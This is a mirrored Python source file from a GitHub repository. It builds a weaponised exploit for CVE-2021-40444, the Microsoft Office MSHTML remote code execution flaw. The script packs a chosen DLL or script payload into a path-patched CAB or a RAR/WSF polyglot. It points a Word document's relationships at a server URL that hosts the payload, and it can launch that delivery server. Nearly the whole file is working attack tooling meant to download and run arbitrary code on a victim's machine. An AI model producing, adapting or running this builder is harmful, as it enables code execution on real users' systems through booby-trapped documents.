mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-14 01:47:54 +00:00
476 lines
17 KiB
Python
476 lines
17 KiB
Python
#!/usr/bin/env python3
|
|
|
|
# Microsoft Office Remote Code Execution Exploit via Logical Bug
|
|
# Result is ability for attackers to execute arbitrary custom DLL's
|
|
# downloaded and executed on target system
|
|
import argparse
|
|
import base64
|
|
import binascii
|
|
import random
|
|
import re
|
|
import secrets
|
|
import shutil
|
|
import string
|
|
import struct
|
|
import sys
|
|
import os
|
|
import subprocess
|
|
import tempfile
|
|
import time
|
|
import traceback
|
|
from pathlib import Path
|
|
import win32com.client
|
|
|
|
from cab_parser import Cab
|
|
from in_place import InPlace
|
|
|
|
|
|
def patch_cab(path: Path, original_inf_path, patched_inf_path):
    """Rewrite header fields of the CAB at *path*, then replace a stored path.

    The file is edited in place in two passes: first the parsed ``Cab``
    structure is modified and serialised back, then every occurrence of
    *original_inf_path* in the raw bytes is replaced by *patched_inf_path*.

    :param path: location of the cabinet file to modify.
    :param original_inf_path: bytes to search for in the cabinet.
    :param patched_inf_path: bytes written in place of *original_inf_path*.
    """
    cab_location = str(path.absolute())

    # Pass 1: structured edits through the Cab parser.
    with InPlace(cab_location, mode="b") as handle:
        archive = Cab(handle.read())
        # Little-endian decode of 00 22 44 00, same value struct "<I" yields.
        size = int.from_bytes(b"\x00\x22\x44\x00", "little")
        steps = (
            (" [*] Setting setID to 1234",
             lambda: archive.change_set_id(1234)),
            (" [*] Setting CFFolder.coffCabStart to 80",
             lambda: archive.change_coff_cab_start(80)),
            (" [*] Setting CFFolder.CCFData to 2",
             lambda: archive.change_ccfdata_count(2)),
            (f" [*] Setting CFFile.CbFile to {size}",
             lambda: archive.change_cffile_cbfile(size)),
            (" [*] Making INF file read only",
             archive.make_file_read_only),
            (" [*] Zeroing out Checksum",
             archive.zero_out_signature),
        )
        for message, apply_step in steps:
            print(message)
            apply_step()
        handle.write(archive.to_bytes())

    # Pass 2: raw byte substitution of the stored path.
    with InPlace(cab_location, mode="b") as handle:
        raw = handle.read().replace(original_inf_path, patched_inf_path)
        print(f" [*] Patching path '{original_inf_path.decode()}' to '{patched_inf_path.decode()}'")
        handle.write(raw)
|
|
|
|
|
|
def make_ddf(ddf_file: Path, cab_file: Path, inf_file: Path):
    """Write the makecab directive (DDF) file to *ddf_file*.

    ``CabinetNameTemplate`` is set to the base name of *cab_file*,
    ``DiskDirectoryTemplate`` to the name of its parent directory, and the
    absolute path of *inf_file* is listed as the single file to pack.
    """
    directives = [
        ".OPTION EXPLICIT",
        f".Set CabinetNameTemplate={cab_file.name}",
        f".set DiskDirectoryTemplate={cab_file.parent.name}",
        ".Set CompressionType=MSZIP",
        ".Set UniqueFiles=OFF",
        ".Set Cabinet=ON",
        ".Set Compress=OFF",
        ".Set CabinetFileCountThreshold=0",
        ".Set FolderFileCountThreshold=0",
        ".Set FolderSizeThreshold=0",
        ".Set MaxCabinetSize=0",
        ".Set MaxDiskFileCount=0",
        ".Set MaxDiskSize=0",
        f'"{inf_file.absolute()}"',
    ]
    with open(str(ddf_file.absolute()), "w") as handle:
        # Each directive sits on its own line; the file ends with a newline.
        handle.write("\n".join(directives) + "\n")
|
|
|
|
|
|
def execute_cmd(cmd, execute_from=None):
    """Echo *cmd*, run it through the shell and abort the program on failure.

    :param cmd: command line, passed to the shell as a single string.
    :param execute_from: working directory for the command (``None`` keeps
        the current one).
    :raises SystemExit: with code 1 when the command exits non-zero.
    """
    print(cmd)
    try:
        subprocess.check_output(cmd, shell=True, cwd=execute_from)
    except subprocess.CalledProcessError as called_process_error:
        print(called_process_error)
        # sys.exit rather than the site-provided exit() helper, which is not
        # guaranteed to exist (python -S, frozen builds) and closes stdin.
        sys.exit(1)
|
|
|
|
|
|
def patch_rar(rar_file, script: bytes):
    """Prepend *script* to the file at *rar_file*, rewriting it in place.

    No separator or terminator byte is inserted between the script and the
    original file contents.

    :param rar_file: path of the file to rewrite.
    :param script: bytes placed in front of the existing contents.
    """
    # Read through a context manager so the handle is closed before the same
    # path is reopened for writing.
    with open(rar_file, "rb") as source:
        original = source.read()

    with open(rar_file, "wb") as target:
        target.write(bytes(script) + original)
|
|
|
|
|
|
def rar(file: Path, rar_file, delete=False):
    """Add *file* to the archive *rar_file* using the bundled ``bin\\rar.exe``.

    :param file: path of the file to add.
    :param rar_file: path of the archive passed to rar.exe.
    :param delete: when true, remove *file* after it was archived.
    :raises SystemExit: with code 1 when rar.exe exits non-zero.
    """
    command = f"bin\\rar.exe a -ep \"{rar_file}\" \"{str(file)}\""
    try:
        subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except subprocess.CalledProcessError as error:
        print("[-] Error generating RAR archive")
        # Surface the tool's own diagnostics instead of discarding them.
        if error.output:
            print(error.output.decode(errors="replace"))
        sys.exit(1)

    if delete:
        file.unlink(missing_ok=True)
|
|
|
|
|
|
def make_rar(rar_file):
    """Create the archive *rar_file* containing one small temporary text file.

    The text file is created with ``delete=False`` so that it still exists
    after being closed; ``rar`` is asked to remove it once archived.
    """
    placeholder = tempfile.NamedTemporaryFile(suffix=".txt", delete=False, mode="w")
    with placeholder:
        placeholder.write("You've been pwnd!")
        placeholder_path = Path(placeholder.name).absolute()

    # Archive only after the file has been closed.
    rar(placeholder_path, rar_file, delete=True)
|
|
|
|
|
|
def choose_template(templates: list):
    """Return one entry of *templates*, asking the user when there are several.

    :param templates: candidate template names.
    :returns: the only entry when there is exactly one, otherwise the entry
        whose index the user typed at the prompt.
    :raises SystemExit: with code 1 when *templates* is empty or the user
        aborts the prompt (Ctrl+C or end of input).
    """
    if not templates:
        # Previously an empty list made the prompt loop forever, because no
        # index can satisfy 0 <= choice <= -1.
        print("[-] No compatible templates found")
        sys.exit(1)

    if len(templates) == 1:
        # Nothing to choose from; skip the misleading "Multiple ..." prompt.
        return templates[0]

    try:
        print("[*] Multiple compatible templates identified, choose one:")
        for index, template in enumerate(templates):
            print(f" {index}: {template}")
        while True:
            try:
                choice = int(input(" $> "))
            except ValueError:
                # Not a number: ask again.
                continue
            if 0 <= choice < len(templates):
                return templates[choice]
    except (KeyboardInterrupt, EOFError):
        print("[-] Aborting")
        sys.exit(1)
|
|
|
|
|
|
def append_garbage(content: str, exploit: str):
    """Return *content* followed by 80000 filler characters for *exploit*.

    The filler is wrapped in syntax chosen by the extension in *exploit*:
    a string assignment for ``.vbs``, a series of assignments for ``.js`` and
    a comment block for ``.wsf``/``.hta``.  Any other extension returns
    *content* unchanged.
    """
    filler = "A" * 80000
    chunks = [filler[start:start + 100] for start in range(0, len(filler), 100)]

    if exploit == ".vbs":
        # Chunks are glued with the VBScript line-continuation sequence.
        joined = '" _ \n & "'.join(chunks)
        return content + f'\nDim Garbage\nGarbage = "{joined}";\n'

    if exploit == ".js":
        statements = [f"x = '{chunk}';" for chunk in chunks]
        return content + "var x = '';\n" + "\n".join(statements)

    if exploit in (".wsf", ".hta"):
        return content + f"<!--\n{filler}\n-->\n"

    return content
|
|
|
|
|
|
def get_file_extension_based_uri(exploit, no_cab=False):
    """Map the payload extension *exploit* to the string used in the template.

    ``.dll`` maps to ``.cpl``.  The script extensions ``.hta``, ``.js``,
    ``.vbs`` and ``.wsf`` map to themselves when *no_cab* is true and to
    ``.wsf`` otherwise.  Everything else maps to ``ms-msdt``.
    """
    if exploit == ".dll":
        return ".cpl"
    if exploit not in (".hta", ".js", ".vbs", ".wsf"):
        return "ms-msdt"
    return exploit if no_cab else ".wsf"
|
|
|
|
|
|
def get_mime_type(exploit):
    """Return the MIME type string associated with the extension *exploit*.

    Extensions without an entry in the table yield ``text/plain``.
    """
    mime_by_extension = {
        ".dll": "application/octet-stream",
        ".hta": "application/hta",
        ".js": "text/javascript",
        ".vbs": "text/vbscript",
        ".wsh": "text/plain",
        ".wsf": "text/xml",
    }
    return mime_by_extension.get(exploit, "text/plain")
|
|
|
|
|
|
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False, convert=False):
    """Build the document, archive and HTML files for *payload*.

    All paths are resolved relative to the directory containing this file
    (``data``, ``srv``, ``out``, ``cab`` and ``template`` sub-directories).

    :param payload: path of the payload file; its extension selects the variant.
    :param server_url: base URL written into the document and HTML template.
    :param basename: base name (no extension) used for the generated files.
    :param copy_to: optional directory that receives a copy of the CAB file.
    :param no_cab: build the CAB-less variant (only ``.wsf`` and ``.ps1``).
    :param convert: additionally convert the generated DOCX to RTF.
    :returns: file name of the generated HTML file inside ``srv``.
    :raises SystemExit: with code 1 on an unsupported combination or when the
        payload cannot be read.
    """
    # Current working directory
    working_directory = Path(__file__).parent

    # Relevant directories for execution
    data_path = working_directory.joinpath("data")
    word_dat_path = data_path.joinpath("word_dat")
    srv_path = working_directory.joinpath("srv")
    out_path = working_directory.joinpath("out")
    cab_path = working_directory.joinpath("cab")
    template_path = working_directory.joinpath("template")

    # Relevant files
    tmp_path = data_path.joinpath("tmp_doc")
    word_dll = data_path.joinpath(f'{basename}.dll')
    word_doc = out_path.joinpath('document.docx')
    ddf = data_path.joinpath('mswordcab.ddf')
    archive_file = out_path.joinpath(f"{basename}.cab")
    rar_file = out_path.joinpath(f"{basename}.rar")
    exploit_file = cab_path.joinpath(f"{basename}.inf")

    # Derived from the ``payload`` argument rather than the module-level
    # ``args`` object, so the function also works when imported and called
    # directly.
    exploit = os.path.splitext(payload)[1]

    if no_cab and exploit not in [".wsf", ".ps1"]:
        print("[-] CAB-less version chosen, only .wsf and .ps1 are currently working")
        sys.exit(1)

    lolbin = exploit not in [".dll", ".ps1"]

    # Prefix identifying which family of HTML templates applies.
    if exploit == ".wsf" and no_cab:
        template_id = "cabless-rar-"
    elif exploit == ".ps1" and no_cab:
        template_id = "cabless-msdt-"
    elif lolbin and no_cab:
        template_id = "cabless-smuggling-"
    elif lolbin:
        template_id = "cab-uri-"
    else:
        template_id = "cab-orig-"

    templates = [
        f for f in os.listdir(str(template_path))
        if os.path.isfile(os.path.join(str(template_path), f))
        and template_id in f
    ]
    html_template_file = template_path.joinpath(choose_template(templates))
    html_final_file = srv_path.joinpath(f"{basename}.html")

    # Checking ephemeral directories
    tmp_path.mkdir(exist_ok=True)
    cab_path.mkdir(exist_ok=True)
    srv_path.mkdir(exist_ok=True)
    out_path.mkdir(exist_ok=True)

    print(f' [>] Payload: {payload}')
    print(f' [>] HTML/CAB/JS Hosting Server: {server_url}')

    b64_payload = None
    payload_content = None
    try:
        if exploit != ".dll":
            # Script payloads are read as text; handles are closed promptly.
            with open(payload, 'r') as script:
                text = script.read().strip()
            if no_cab:
                payload_content = text.encode()
            else:
                payload_content = append_garbage("\x5a\x4d" + text, exploit).encode()
        else:
            with open(payload, 'rb') as binary:
                payload_content = binary.read()
        with open(str(word_dll), 'wb') as filep:
            filep.write(payload_content)
        b64_payload = base64.b64encode(payload_content).decode()
    except FileNotFoundError:
        print('[-] Payload specified not found!')
        sys.exit(1)
    except Exception as e:
        print(f"[-] Exception: {e}")
        sys.exit(1)

    if lolbin and no_cab:
        tmp = Path(exploit_file.parent).joinpath(basename + get_file_extension_based_uri(exploit))
        exploit_file.unlink(missing_ok=True)
        exploit_file = Path(tmp)
        with open(str(exploit_file), "w") as out:
            out.write(payload_content.decode())
        print(f"[*] Exposing script file {exploit_file.name} to the webserver for download")
        shutil.copy(str(exploit_file), str(srv_path))

    shutil.copytree(str(word_dat_path), str(tmp_path), dirs_exist_ok=True)
    print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
    with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
        xml_content = rels.read()
        if exploit != ".ps1":
            xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
        else:
            xml_content = xml_content.replace('mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}!')
        rels.write(xml_content)

    print('[*] Packing MS Word .docx file...')
    word_doc.unlink(missing_ok=True)
    # make_archive appends ".zip"; the result is renamed to the .docx name.
    shutil.make_archive(str(word_doc), 'zip', str(tmp_path))
    shutil.move(str(word_doc) + ".zip", str(word_doc))
    shutil.rmtree(str(tmp_path))

    if not no_cab:
        print('[*] Generating CAB file...')
        make_ddf(ddf_file=ddf, cab_file=archive_file, inf_file=exploit_file)
        shutil.move(word_dll, exploit_file)

        execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
        patched_path = f'../{exploit_file.name}'.encode()
        patch_cab(archive_file, str(exploit_file.name).encode(), patched_path)
        shutil.copy(archive_file, srv_path)
        shutil.copy(ddf, srv_path)

    # Remove intermediate files.
    word_dll.unlink(missing_ok=True)
    exploit_file.unlink(missing_ok=True)
    ddf.unlink(missing_ok=True)
    shutil.rmtree(str(cab_path.absolute()))

    print('[*] Updating information on HTML exploit...')
    shutil.copy(str(html_template_file), str(html_final_file))

    print('[*] Copying MS Word .docx to Desktop for local testing...')
    dest = Path(os.getenv("USERPROFILE")).joinpath("Desktop").joinpath(word_doc.name)
    dest.unlink(missing_ok=True)
    shutil.copy(str(word_doc.absolute()), dest)

    if copy_to and os.path.isdir(copy_to) and not no_cab:
        print(f'[*] Copying malicious cab to {copy_to} for analysis...')
        dest = Path(copy_to).joinpath(archive_file.name)
        dest.unlink(missing_ok=True)
        shutil.copy(str(archive_file.absolute()), dest)
        print(f' [>] CAB file stored at: {archive_file}')

    # Fill the placeholders of the copied HTML template.
    uri_scheme = get_file_extension_based_uri(exploit)
    with InPlace(str(html_final_file)) as p_exp:
        content = p_exp.read()
        content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{archive_file.name}")
        content = content.replace('<INF_CHANGE_HERE>', f"{exploit_file.name}")
        content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
        content = content.replace('<URI_SCHEME_HERE>', uri_scheme)
        content = content.replace('<BASE64_DATA_HERE>', b64_payload)
        # NOTE(review): the conditional applies to the whole right-hand side,
        # so for ".dll" `content` becomes "" here. Confirm whether only the
        # placeholder was meant to be blanked; behaviour left unchanged.
        content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) if exploit != ".dll" else ""
        content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
        content = content.replace('<FIRST_LETTER>', uri_scheme[1])
        content = content.replace('<SECOND_LETTER>', uri_scheme[2])
        content = content.replace('<THIRD_LETTER>', uri_scheme[3])
        p_exp.write(content)

    print(f'[+] Success! MS Word Document stored at: {word_doc}')

    if convert:
        if convert_to_rtf(word_doc):
            print(f'[+] Success! MS Word Document was converted to RTF!')
        else:
            print(f'[-] ERROR. MS Word Document could not be converted to RTF.')

    if exploit == ".wsf" and no_cab:
        print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
        rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
        wsf_file = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath("test.wsf")
        rar(word_doc, rar_dest, delete=False)
        patch_rar(rar_file=rar_dest, script=payload_content)
        shutil.copy(str(rar_dest), str(srv_path))
        shutil.copy(str(rar_dest), str(wsf_file))

    return html_final_file.name
|
|
|
|
|
|
def start_server(ip, port, directory: Path):
    """Launch ``util/server.py`` in a new console window rooted at *directory*.

    The script is started through the shell ``start`` command with *ip* and
    *port* as its arguments; this function does not wait for it.
    """
    server_script = Path(__file__).parent / "util" / "server.py"
    command = (
        f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" '
        f'cmd /c python "{server_script.absolute()}" {ip} {port}'
    )
    # Fully detached: no inherited handles and no output captured.
    subprocess.Popen(
        command,
        shell=True,
        close_fds=True,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        creationflags=subprocess.DETACHED_PROCESS,
    )
|
|
|
|
|
|
def start_client(url):
    """Open *url* in Internet Explorer as a detached process.

    The browser is started from its fixed ``C:\\Program Files`` location and
    is not waited for.
    """
    command = f'"C:\\Program Files\\Internet Explorer\\iexplore.exe" "{url}"'
    subprocess.Popen(
        command,
        shell=True,
        close_fds=True,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        creationflags=subprocess.DETACHED_PROCESS,
    )
|
|
|
|
|
|
def clean():
    """Placeholder that currently does nothing and returns ``None``."""
|
|
|
|
|
|
def convert_to_rtf(filename):
    """Save a copy of the Word document *filename* in RTF format.

    The copy is written next to the original with the extension replaced by
    ``.rtf``.  The conversion is done by automating Word through COM.

    :param filename: path of the document to convert.
    :returns: ``True`` on success, ``False`` when any step failed (the
        traceback is printed).
    """
    new_file = os.path.splitext(filename)[0] + ".rtf"
    word = None
    try:
        word = win32com.client.Dispatch("Word.application")
        word.Visible = False
        word_doc = word.Documents.Open(str(Path(filename).absolute()))
        # wdFormatRTF = 6
        word_doc.SaveAs2(str(Path(new_file).absolute()), FileFormat=6)
        word_doc.Close()
        return True
    except Exception:
        # Exception instead of a bare except, so Ctrl+C and SystemExit
        # still propagate.
        traceback.print_exc()
        return False
    finally:
        # Shut down the automation instance; otherwise each call leaves a
        # hidden Word process running.
        if word is not None:
            try:
                # wdDoNotSaveChanges = 0
                word.Quit(SaveChanges=0)
            except Exception:
                traceback.print_exc()
|
|
|
|
|
|
def validate_filename(filename):
    """Return *filename* normalised to exactly 12 characters.

    Longer names are truncated.  Shorter names, including an empty or missing
    one, are padded on the right with random upper-case letters and digits.
    """
    # Required length for the file name
    required_length = 12
    alphabet = string.ascii_uppercase + string.digits

    stem = (filename or "")[:required_length]
    rng = random.SystemRandom()
    padding = "".join(rng.choice(alphabet) for _ in range(required_length - len(stem)))
    return stem + padding
|
|
|
|
|
|
if __name__ == '__main__':
    # Command-line entry point.  The statements stay at module level (not in
    # a main() function) so that names such as ``args`` remain module globals.
    from urllib.parse import urlsplit

    parser = argparse.ArgumentParser(description='[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]')
    parser.add_argument('-P', '--payload', type=str, required=True,
                        help="DLL payload to use for the exploit")
    parser.add_argument('-u', '--url', type=str, default=None, required=True,
                        help="Server URL for malicious references (CAB->INF)")
    parser.add_argument('-o', '--output', type=str, default=None, required=False,
                        help="Output files basename (no extension)")
    parser.add_argument('--host', action='store_true', default=False, required=False,
                        help="If set, will host the payload after creation")
    parser.add_argument('-c', '--copy-to', type=str, default=None, required=False,
                        help="Copy payload to an alternate path")
    parser.add_argument('-nc', '--no-cab', action='store_true', default=False, required=False,
                        help="Use the CAB-less version of the exploit")
    parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
                        help="Open IExplorer to test the final HTML file")
    parser.add_argument('-x', '--convert', action='store_true', default=False, required=False,
                        help="Convert DOCX into RTF format")

    args = parser.parse_args()

    filename = validate_filename(args.output)

    print('[*] Generating a malicious payload...')
    html = None
    server = args.url

    # Defaults, overwritten by whatever the URL specifies.
    port = 80
    ip = "127.0.0.1"
    scheme = ""
    default_ports = {"http": 80, "https": 443}
    try:
        url_parts = urlsplit(server)
        scheme = url_parts.scheme
        if scheme not in default_ports:
            # NotImplementedError is the exception class; the NotImplemented
            # singleton can be neither raised nor caught.
            raise NotImplementedError(f"Scheme {scheme} is not supported")
        if not url_parts.hostname:
            raise ValueError("URL has no host component")
        ip = url_parts.hostname
        # .port raises ValueError for a non-numeric or out-of-range port.
        port = url_parts.port or default_ports[scheme]
    except NotImplementedError as e:
        print(f"[-] {e}")
        sys.exit(1)
    except ValueError:
        print("[-] Wrong URL format")
        sys.exit(1)

    try:
        html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
                                no_cab=args.no_cab, convert=args.convert)
    except (SystemExit, KeyboardInterrupt):
        sys.exit(1)
    except Exception:
        traceback.print_exc()
        sys.exit(1)

    if args.host and html:
        print(f'[*] Hosting HTML Exploit at {scheme}://{ip}:{port}/{html}...')
        start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv"))

    if args.test:
        if os.path.splitext(args.payload)[1] != ".wsf":
            print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
        print(f'[*] Opening IE at {args.url}/{html}...')
        # Short pause before the browser is pointed at the URL.
        time.sleep(3)
        start_client(f"{args.url}/{html}")
|